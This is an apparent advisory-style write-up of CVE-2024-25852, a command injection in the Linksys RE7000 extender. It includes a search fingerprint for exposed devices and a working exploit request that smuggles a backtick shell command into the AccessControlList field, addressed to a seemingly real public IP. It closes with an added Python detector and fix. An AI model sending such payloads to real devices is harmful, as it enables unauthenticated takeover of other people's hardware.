eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00
# Linksys RE7000 Wireless Range Extender RCE (CVE-2024-25852)
### 1. Vulnerability description
The Linksys RE7000 wireless range extender has a command execution vulnerability in the AccessControlList parameter of its access control feature. An unauthenticated remote attacker can exploit it to obtain administrator privileges on the device.
### 2. Affected versions
Linksys RE7000 wireless range extender
### 3. Asset discovery
body="/login.shtml?ran="
![1718333560229-60861c15-6d19-413d-86ff-12a39b9c2c6d.png](./img/vv1PxtfgpgbamSsw/1718333560229-60861c15-6d19-413d-86ff-12a39b9c2c6d-984843.png)
Interface
![1718333587335-4900165d-3c0a-4a16-8a8f-b793b87f79c8.png](./img/vv1PxtfgpgbamSsw/1718333587335-4900165d-3c0a-4a16-8a8f-b793b87f79c8-026376.png)
### 4. Vulnerability reproduction
```plain
PUT /goform/AccessControl HTTP/1.1
Host: 121.137.162.121
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 87

{"AccessPolicy":"0","AccessControlList":"`ip a>/etc_ro/lighttpd/RE7000_www/qqi.txt`"}
```
Construct the request and send it.
![1718333420542-224485fe-1557-444d-988e-e192f2531b3a.png](./img/vv1PxtfgpgbamSsw/1718333420542-224485fe-1557-444d-988e-e192f2531b3a-604259.png)
Access the qqi.txt file to retrieve the returned information.
![1718333496307-c39af445-f271-4b7f-838a-d9a88beee01f.png](./img/vv1PxtfgpgbamSsw/1718333496307-c39af445-f271-4b7f-838a-d9a88beee01f-602094.png)
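For detection, the request above has a recognisable shape: a write to `/goform/AccessControl` whose `AccessControlList` value contains shell metacharacters instead of list entries. The following is an added example (not part of the original write-up) that classifies raw HTTP requests on that basis; the sample requests, the placeholder host `extender.example` and the assumption that legitimate entries are MAC addresses are constructed here.

```python
import json
import re

# The endpoint and JSON parameter come from the write-up above; the sample
# requests below are constructed and use a placeholder host.
VULN_PATH = "/goform/AccessControl"
VULN_PARAM = "AccessControlList"
# Characters that let a value escape into a shell (backticks, $(), ;, |, &, redirects).
SHELL_META = re.compile(r"[`$;|&<>\n]")
# Assumption: legitimate list entries are MAC addresses.
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}$")

def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, body); CRLF or LF line endings."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    method, path, _ = head.splitlines()[0].split(" ", 2)
    return method, path, body.strip()

def inspect_request(raw: str) -> dict:
    """Classify a request as 'injection', 'suspicious' or 'clean'."""
    method, path, body = parse_request(raw)
    if path.split("?")[0] != VULN_PATH:
        return {"verdict": "clean", "reason": "not the affected endpoint"}
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return {"verdict": "suspicious", "reason": f"{method} with non-JSON body"}
    value = str(data.get(VULN_PARAM, ""))
    if SHELL_META.search(value):
        return {"verdict": "injection", "reason": f"shell metacharacters in {VULN_PARAM}: {value!r}"}
    entries = [e for e in re.split(r"[,\s]+", value) if e]
    if any(not MAC_RE.match(e) for e in entries):
        return {"verdict": "suspicious", "reason": f"non-MAC entry in {VULN_PARAM}: {value!r}"}
    return {"verdict": "clean", "reason": "well-formed list"}

# Constructed samples (placeholder host, not the request from the write-up).
INJECTION = ("PUT /goform/AccessControl HTTP/1.1\r\nHost: extender.example\r\n"
             "Content-Type: application/json\r\n\r\n"
             '{"AccessPolicy":"0","AccessControlList":"`id`"}')
BENIGN = ("PUT /goform/AccessControl HTTP/1.1\r\nHost: extender.example\r\n\r\n"
          '{"AccessPolicy":"1","AccessControlList":"00:11:22:33:44:55,66:77:88:99:AA:BB"}')
OTHER = "GET /login.shtml?ran=1 HTTP/1.1\r\nHost: extender.example\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("INJECTION", INJECTION), ("BENIGN", BENIGN), ("OTHER", OTHER)):
        print(name, inspect_request(req))
```

The same check, applied at the firmware side as an allow-list on `AccessControlList` before the value reaches any shell, is the fix that removes the vulnerability rather than merely flagging it.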
> Updated: 2024-06-23 23:46:34
> Source: <https://www.yuque.com/xiaokp7/ocvun2/zdaghns0azgvr8ns>